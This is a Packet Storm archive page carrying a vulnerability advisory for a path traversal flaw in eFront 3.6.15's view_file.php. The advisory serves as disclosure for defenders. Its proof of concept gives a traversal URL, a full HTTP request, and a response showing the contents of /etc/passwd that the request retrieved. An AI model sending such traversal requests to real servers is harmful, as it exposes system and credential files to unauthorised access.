what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eFront 3.6.15 Path Traversal

eFront 3.6.15 Path Traversal
Posted May 9, 2015
Authored by Filippo Roncari

eFront version 3.6.15 suffers from a path traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | a476ea58150c85448541cd9202fd3d711f5606a92b2cf89b5303ddb568cf40ad

eFront 3.6.15 Path Traversal

Change Mirror Download
eFront 3.6.15 Path Traversal Vulnerability

[+] Author: Filippo Roncari
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it


[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.


[+] Vulnerability Details
eFront 3.6.15 is prone to a critical path traversal vulnerability involving the view_file.php module, due to improper user-input sanitization and unsafe inner normalize() function logic. Any unprivilieged attacker could exploit this vulnerability by manipulating HTTP parameter value in order to climb the directories tree and access arbitrary files on the remote file system. This issue can lead to critical confidentiality violations, depending on the privileges assigned to the application server.


[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.


[+] Proof of Concept (PoC)

[!] PoC URL
-----------------------------
http://target.site/www/view_file.php?action=download&file=/[EFRONT_BASE_PATH]/../../../../../../etc/passwd/
_____________________________

[!] HTTP Request
-----------------------------
GET /test/efront/www/view_file.php?action=download&file=/Applications/MAMP/htdocs/test/efront/../../../../../etc/passwd/ HTTP/1.1
Host: localhost
Cookie: display_all_courses=1; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; SQLiteManager_currentLangue=6;
PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; parent_sid=d36bed784e063e65cf31721f8ec7a0bd
-----------------------------

[!] HTTP Response
-----------------------------
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2015 13:20:43 GMT Content-Description: File Transfer
Content-Disposition: attachment; filename="passwd" Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public
Content-Length: 5253
Content-Type: application/download

##
# User Database #
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory. #
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false

[...]
_____________________________

For technical details and explanations check the full advisory.


[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close